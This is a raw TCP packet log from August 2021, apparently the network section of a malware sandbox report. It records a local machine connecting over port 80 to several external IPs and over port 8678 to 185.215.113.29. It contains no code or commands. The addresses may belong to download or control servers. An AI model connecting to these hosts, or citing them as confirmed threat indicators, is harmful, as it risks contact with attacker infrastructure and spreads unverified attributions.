Aug 23, 2021 02:08:03.505783081 CEST	49717	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:03.505881071 CEST	49717	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:03.506431103 CEST	49717	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:03.791399002 CEST	80	49717	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:07.622343063 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:07.622530937 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:07.622991085 CEST	49715	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:07.638027906 CEST	80	49717	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:07.638092041 CEST	80	49717	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:07.638148069 CEST	49717	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:07.638186932 CEST	49717	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:07.654510975 CEST	80	49715	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:07.676049948 CEST	49726	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:07.922262907 CEST	80	49717	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:07.955454111 CEST	80	49726	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:07.955851078 CEST	49726	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:07.956429005 CEST	49726	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:07.956486940 CEST	49726	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:08.236131907 CEST	80	49726	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:09.186558962 CEST	80	49726	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:09.186587095 CEST	80	49726	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:09.186655998 CEST	49726	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:09.186701059 CEST	49726	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:09.280483961 CEST	49727	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:09.466080904 CEST	80	49726	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:09.534514904 CEST	80	49727	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:09.534673929 CEST	49727	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:09.536305904 CEST	49727	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:09.536798954 CEST	49727	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:09.791085958 CEST	80	49727	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:10.809175014 CEST	80	49727	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:10.809251070 CEST	80	49727	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:10.809339046 CEST	49727	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:10.809384108 CEST	49727	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:10.850747108 CEST	49728	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:11.063371897 CEST	80	49727	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:11.113403082 CEST	80	49728	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:11.113712072 CEST	49728	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:11.113811970 CEST	49728	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:11.113852024 CEST	49728	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:11.376662970 CEST	80	49728	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:12.067374945 CEST	80	49728	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:12.067449093 CEST	80	49728	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:12.067965984 CEST	49728	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:12.068075895 CEST	49728	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:12.075985909 CEST	49729	80	192.168.2.3	193.142.59.248
Aug 23, 2021 02:08:12.333146095 CEST	80	49728	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:15.159662008 CEST	49729	80	192.168.2.3	193.142.59.248
Aug 23, 2021 02:08:21.253956079 CEST	49729	80	192.168.2.3	193.142.59.248
Aug 23, 2021 02:08:23.633703947 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:23.690217018 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:23.690459013 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:23.959485054 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:24.016151905 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:24.153187037 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:24.862701893 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:24.920329094 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:24.974118948 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:29.016563892 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:29.074770927 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:29.075314045 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:29.076555014 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:30.939852953 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:31.029830933 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:33.302618027 CEST	49732	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:33.535092115 CEST	80	49732	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:33.535229921 CEST	49732	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:33.535335064 CEST	49732	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:33.535353899 CEST	49732	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:33.767805099 CEST	80	49732	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:34.451109886 CEST	80	49732	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:34.451237917 CEST	80	49732	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:34.451412916 CEST	49732	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:34.451713085 CEST	49732	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:08:34.506889105 CEST	49733	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:34.684218884 CEST	80	49732	218.233.73.202	192.168.2.3
Aug 23, 2021 02:08:34.778824091 CEST	80	49733	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:34.778955936 CEST	49733	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:34.779098988 CEST	49733	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:34.779130936 CEST	49733	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:35.051470041 CEST	80	49733	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:35.951947927 CEST	80	49733	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:35.951994896 CEST	80	49733	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:35.952224016 CEST	49733	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:35.955018044 CEST	49733	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:36.227250099 CEST	80	49733	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:36.276457071 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:36.548938990 CEST	80	49734	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:36.549083948 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:36.611932039 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:36.611984968 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:36.780169964 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:36.840858936 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:36.840929031 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:36.840981007 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:36.841003895 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:36.881831884 CEST	80	49734	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:36.895843029 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:37.167598009 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:37.264359951 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:37.851044893 CEST	80	49734	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:37.851192951 CEST	80	49734	220.125.1.129	192.168.2.3
Aug 23, 2021 02:08:37.851216078 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:37.851253986 CEST	49734	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:08:37.861247063 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.892710924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.893227100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.893347025 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.924655914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925163984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925209045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925246954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925282001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925293922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.925321102 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925352097 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.925359011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925405979 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925410032 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.925447941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925806046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925847054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.925880909 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.925920010 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.956537008 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956623077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956650972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956672907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956691027 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956706047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956721067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956737041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956758976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956774950 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956798077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956820011 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956836939 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956861019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956913948 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956933022 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.956949949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956970930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956970930 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.956979990 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.956986904 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.956991911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.956994057 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.957000017 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.957007885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.957022905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.957278967 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988059044 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988089085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988116026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988141060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988164902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988188028 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988210917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988213062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988234043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988255978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988255978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988277912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988284111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988303900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988328934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988337040 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988351107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988375902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988389015 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988398075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988420010 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988439083 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988440990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988462925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988487005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988501072 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988509893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988511086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988533020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988554955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988559008 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988575935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988596916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988600969 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988619089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988640070 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988651991 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988663912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988682985 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988687992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988708973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988728046 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988729954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988751888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988771915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988792896 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988807917 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988814116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988818884 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988840103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988862038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988882065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988893032 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988904953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988909006 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988924980 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988945961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:37.988955021 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:37.988990068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.021653891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021678925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021692038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021703005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021714926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021727085 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021740913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021754026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021766901 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021779060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021791935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021802902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021815062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021826982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021838903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021851063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021863937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021874905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021887064 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021898985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021912098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021923065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021934986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021946907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021959066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021970034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021981001 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.021991968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022003889 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022016048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022027969 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022038937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022051096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022062063 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022073030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022084951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022095919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022108078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022119999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022131920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022142887 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022155046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022167921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022180080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022192955 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022203922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022216082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022227049 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.022460938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053458929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053491116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053510904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053529978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053551912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053560972 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053579092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053607941 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053617954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053628922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053641081 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053662062 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053683043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053684950 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053704023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053720951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053725004 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053749084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053772926 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053796053 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053797007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053816080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053828955 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053838968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053860903 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053864956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053880930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053894997 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053900957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053922892 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053942919 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053946972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053970098 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.053983927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.053992033 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054013968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054043055 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054063082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054064035 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.054083109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054094076 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.054102898 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054126024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054128885 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.054147959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054172039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054181099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.054193020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054214954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054233074 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.054234982 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054258108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.054258108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054280043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054297924 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054315090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054382086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054405928 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054420948 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054436922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054451942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054467916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054481983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054497957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.054513931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.055027962 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.086169004 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086198092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086215019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086230040 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086246967 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086261988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.086282969 CEST	80	49735	193.142.59.123	192.168.2.3
